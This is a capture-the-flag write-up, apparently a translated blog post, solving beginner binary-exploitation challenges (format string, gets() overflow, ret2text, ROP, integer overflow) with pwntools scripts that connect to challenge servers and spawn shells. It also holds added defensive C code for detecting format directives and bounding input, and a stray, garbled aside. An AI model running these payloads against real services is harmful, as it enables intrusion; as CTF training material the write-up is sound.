Attack and defense world novice zone PWN
2022-07-24 18:35:00 【ca1man】
get_shell
Challenge description: you can get a shell just by running it. Really?
First run checksec:
64-bit
Only NX (non-executable stack) is enabled
Open it in IDA
Look at main: a big fat system("/bin/sh") sits right there
The difference between the puts address and the binsh address is the offset
exp
from pwn import *
m = remote('220.249.52.133', xxxxx)  # port left as a placeholder in the original
binsh = 0x400574
payload = b'a' * (0x3a - 0x18) + p64(binsh)
m.sendline(payload)
m.interactive()

CGfsb
Source: CGCTF
Challenge description: the rookie gets nervous facing printf; he does not know what else printf does besides printing
checksec
32-bit; only PIE is disabled (a program built with PIE gets a different load base every time it is loaded, which also invalidates the gadgets)
Analyze the main function:
Obviously it is enough to make pwnme equal to 8
Format string vulnerability
Introduction to the common basic format string parameters:
%c: outputs a character; combined with %n it can be used to write data to a specified address
%d: outputs a decimal integer; combined with %n it can be used to write data to a specified address.
%x: outputs hexadecimal data. %i$x leaks the 4-byte hexadecimal value at offset i, %i$lx leaks the 8-byte hexadecimal value at offset i; the same in 32-bit and 64-bit environments.
%p: outputs hexadecimal data, essentially the same as %x but prefixed with 0x; it outputs 4 bytes on 32-bit and 8 bytes on 64-bit, so the length of the output tells you whether the target environment is 32-bit or 64-bit.
%s: outputs a string, namely the string pointed to by the pointer at the offset. %i$s outputs the string pointed to by the address at offset i; the same in 32-bit and 64-bit environments; it can be used to read the GOT table and other information.
%n: stores the number of characters printf has printed before the %n into the address pointed to by the pointer at the offset. For example, %100c%10$n writes 0x64 to the address pointed to by the pointer saved at offset 10 (4 bytes); %hn (e.g. %i$hn) writes a 2-byte space, %hhn writes 1 byte, %lln writes 8 bytes; the same in 32-bit and 64-bit environments.
Sometimes writing 4 bytes at once crashes the program or takes too long; %hn or %hhn can be used to adjust. %n is the key way to change the program flow through a format string vulnerability; the other format parameters are used to read information or to cooperate with %n when writing data.
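The defensive side of the parameter list above, as an added example that is not part of the original writeup: a small C scanner that recognises printf conversion directives (including the %n family) in untrusted text, so a code review or input filter can flag them, next to the correct way to print user-supplied text. The function names, DIRECTIVE_BODY and the sample strings are my own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original writeup.
 * Characters that may sit between '%' and the conversion character:
 * flags, width, precision, the positional "$" and length modifiers. */
static const char DIRECTIVE_BODY[] = "0123456789$.-+ #*lhqjzLt";

/* p points just past a '%'; skip the directive body and return a pointer
 * to the conversion character (or to the terminating NUL). */
static const char *skip_directive_body(const char *p) {
    while (*p && strchr(DIRECTIVE_BODY, *p)) p++;
    return p;
}

/* Count conversion directives in s; "%%" is a literal percent, not a directive.
 * A non-zero count in text that is about to be used as a format is the bug. */
int count_format_directives(const char *s) {
    int n = 0;
    const char *p = s;
    while (*p) {
        if (*p != '%') { p++; continue; }
        if (p[1] == '%') { p += 2; continue; }
        n++;
        p = skip_directive_body(p + 1);
        if (*p) p++;                      /* step over the conversion character */
    }
    return n;
}

/* 1 if s contains a write directive: a directive whose conversion is 'n'
 * (%n, %hn, %hhn, %lln, %10$n, ...), the one that turns a read into a write. */
int contains_write_directive(const char *s) {
    const char *p = s;
    while (*p) {
        if (*p != '%') { p++; continue; }
        if (p[1] == '%') { p += 2; continue; }
        p = skip_directive_body(p + 1);
        if (*p == 'n') return 1;
        if (*p) p++;
    }
    return 0;
}

/* The fix for the bug class: user text is an argument, never the format.
 * The vulnerable form is printf(msg); gcc -Wformat-security warns on it. */
int safe_echo(const char *msg) {
    return printf("%s\n", msg);           /* fputs(msg, stdout) works too */
}
```

The scanner is a defence-in-depth filter and audit aid only; the real fix is `safe_echo`'s shape, and building with `-Wall -Wformat -Wformat-security` makes the compiler point at every `printf(msg)` call site.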
Here %n is used to write 8.
So what we need to do is:
put the address of pwnme into s, i.e. into message
find the offset
place the %n correctly
pwnme is a global variable in the .bss segment, so its address does not change
Run ./file and, at the message prompt, enter AAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p
The AAA we entered shows up at position 10, so the offset is 10
exp
from pwn import *
m = remote('220.249.52.133', 54971)
pwnme = 0x0804A068
# 4 address bytes + 4 filler bytes = 8 characters printed before %n,
# so %10$n stores 8 into pwnme
payload = p32(pwnme) + b'aaaa' + b'%10$n'
m.recvuntil(b"please tell me your name:\n")
m.sendline(b'caiman')
m.recvuntil(b"leave your message please:\n")
m.sendline(payload)
m.interactive()
Running results 
when_did_you_born
Source: CGCTF
Challenge description: as long as you know your age you can get the flag, but the rookie finds that the input is always wrong no matter what. What to do?
64-bit; address randomization, stack protection and NX are enabled
Run it: you need to enter your birthday and your name
Open it in IDA and analyze main
It is enough that v5 == 1926, but the first if does not allow 1926 to be entered directly. gets(&v4) places no limit on the input length,
so write into v4 and overflow into v5: when the name is asked for, enter the padding bytes followed by 1926
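The reason the overflow above works is that gets(&v4) cannot know how big v4 is. As an added example (not code from the challenge or the writeup), here is the bounded replacement in C, replayed against a constructed stand-in for the frame so the neighbouring value survives a long name. read_line_bounded, struct frame, struct prompt_result, run_prompts and the scripted input are all my own names and assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not code from the challenge or the writeup.
 * Read one line into dst (at most cap-1 bytes) and strip the newline.
 * If the line was longer than the buffer, discard the remainder so the
 * next prompt does not consume it, and report the truncation.
 * Returns 0 = ok, 1 = truncated, -1 = EOF or error. */
int read_line_bounded(FILE *in, char *dst, size_t cap) {
    if (cap == 0) return -1;
    if (fgets(dst, (int)cap, in) == NULL) { dst[0] = '\0'; return -1; }
    size_t len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') { dst[len - 1] = '\0'; return 0; }
    int c, truncated = 0;
    while ((c = fgetc(in)) != EOF && c != '\n') truncated = 1;
    return truncated;
}

/* Constructed stand-in for the challenge's frame: the name buffer (v4)
 * sits directly below the value the check compares against (v5). */
struct frame { char v4[8]; long v5; };

/* Result of replaying both prompts against a scripted input. */
struct prompt_result { int birth_rc; int name_rc; long v5_after; char name[8]; };

/* Replay the "birth" and "name" prompts over a scripted stdin. The script is
 * written to a tmpfile() (plain ISO C). With gets() a long name would run
 * over v5; with the bounded reader v5 keeps its value and the caller is told
 * that the name was cut. */
struct prompt_result run_prompts(const char *script) {
    struct prompt_result r;
    struct frame fr;
    char birth[16];
    memset(&r, 0, sizeof r);
    memset(&fr, 0, sizeof fr);               /* v5 starts at 0 and must stay 0 */
    FILE *in = tmpfile();
    if (in == NULL) { r.birth_rc = r.name_rc = -1; return r; }
    fputs(script, in);
    rewind(in);
    r.birth_rc = read_line_bounded(in, birth, sizeof birth);   /* What's Your Birth? */
    r.name_rc = read_line_bounded(in, fr.v4, sizeof fr.v4);    /* What's Your Name?  */
    fclose(in);
    r.v5_after = fr.v5;
    memcpy(r.name, fr.v4, sizeof r.name);
    return r;
}
```

The draining loop matters as much as the size argument: without it, the unread tail of an over-long name would be handed to the next fgets call, which is a different but equally confusing failure.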
exp
from pwn import *
m = remote(" ", )  # host and port left blank in the original
payload = b'a' * (0x20 - 0x18) + p64(1926)
m.recvuntil(b"What's Your Birth?\n")
m.sendline(b"111")
m.recvuntil(b"What's Your Name?\n")
m.sendline(payload)
m.interactive()
level0
Source: XMAN
Challenge description: the rookie knows what an overflow is and believes he can get a shell
64-bit; only NX is enabled
Run it: nothing interesting
Open it in IDA and analyze main
Noteworthy function:
callsystem() can get a shell

The read() call overflows; overwrite the return address with the entry of callsystem
sys_addr = 0x400596
exp
from pwn import *
ma = remote('47.114.137.161', 50944)
sys_addr = 0x400596
payload = b'a' * 0x80 + b'b' * 8 + p64(sys_addr)
ma.sendline(payload)
ma.interactive()
level2
Source: XMAN
Challenge description: the rookie asks the great god how to get the flag; the great god tells him "just use return-oriented programming (ROP)"
checksec
32-bit; only NX protection is enabled
Look at main in IDA

Shift+F12 to find the string /bin/sh
exp
# ROP
from pwn import *
m = remote('', )  # host and port left blank in the original
system_addr = 0x08048320
binsh = 0x0804A024
payload = b'a' * 0x88 + b'aaaa' + p32(system_addr) + b'aaaa' + p32(binsh)
m.sendline(payload)
m.interactive()
cgpwn2
Source: CGCTF
Challenge description: the rookie thinks he needs a string
32-bit program; RELRO and NX are enabled
Open it in IDA
Do not overlook fgets() and gets()
The global variable name is in the .bss segment, so its address does not change; write /bin/sh into it

The offset (0xD9-0xF7)
exp
from pwn import *
m = remote('220.249.52.133', 55046)
system_addr = 0x08048420
name_addr = 0x804a080
m.sendline(b"/bin/sh")
payload = b'a' * 42 + p32(system_addr) + b'aaaa' + p32(name_addr)
m.sendline(payload)
m.interactive()
Positioning pattern
For some reason a QR-code positioning pattern got inserted here?!
int_overflow
Challenge description: the rookie feels there is no way to overflow in this challenge. Really?
- First check the protection mechanism
checksec 1
no canary found

When entering the password, the program takes the length of the string and stores it in an _int8 variable; _int8 is a single byte, so it wraps at 256.
The password length is restricted to between 3 and 8 bytes; using the integer overflow, 259-264 bytes also pass (the overflowed part is discarded and only the low byte, 3-8, is kept).
what_is_this: you can see that it runs cat flag
Overall idea: use the integer overflow to overwrite the return address of check_passwd with what_is_this and run cat flag
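The narrowing the writeup describes, side by side with the corrected check, as an added C example that is not the challenge binary's code: the truncated check accepts the wrap-around lengths, the full-width check does not, and an audit helper counts exactly where the two disagree. truncated_length_ok, hardened_length_ok, count_disagreements and copy_passwd_checked are my own names.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added example, not the challenge binary's code. The length check as the
 * writeup describes it: strlen() is stored in an 8-bit variable before the
 * 3..8 comparison, so only the low byte of the real length is compared. */
int truncated_length_ok(size_t len) {
    uint8_t v = (uint8_t)len;          /* 259 -> 3, 264 -> 8, 265 -> 9 */
    return v >= 3 && v <= 8;
}

/* Hardened check: compare the full size_t, no narrowing anywhere. */
int hardened_length_ok(size_t len) {
    return len >= 3 && len <= 8;
}

/* Audit helper: how many lengths in [0, max_len] the two checks disagree on.
 * Against the truncated check this counts exactly the wrap-around lengths. */
size_t count_disagreements(size_t max_len) {
    size_t n = 0;
    for (size_t len = 0; len <= max_len; len++)
        if (truncated_length_ok(len) != hardened_length_ok(len)) n++;
    return n;
}

/* A copy routine that cannot overflow: the hardened check and the destination
 * capacity decide, and the copy is sized from the value that was checked.
 * Returns 1 on success, 0 if the password is rejected. */
int copy_passwd_checked(const char *passwd, char *dst, size_t dst_cap) {
    size_t len = strlen(passwd);
    if (!hardened_length_ok(len) || len >= dst_cap) return 0;
    memcpy(dst, passwd, len + 1);      /* len + 1 <= dst_cap, includes the NUL */
    return 1;
}
```

In the original pattern the narrowing is implicit (a size_t assigned to a one-byte variable); building with `-Wconversion` makes gcc and clang report that assignment, which is the cheapest way to find this bug class across a code base.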
exp
from pwn import *
io = remote('111.200.241.244', 58194)
sys_addr = 0x08048694
payload = b'a' * 0x14 + b'bbbb' + p32(sys_addr) + b'a' * (256 - 14 - 4 - 4)
io.sendlineafter(b"Your choice:", b"1")
io.sendlineafter(b"Please input your username:", b"caiman")
io.recvuntil(b"Please input your passwd:")
io.sendline(payload)
io.interactive()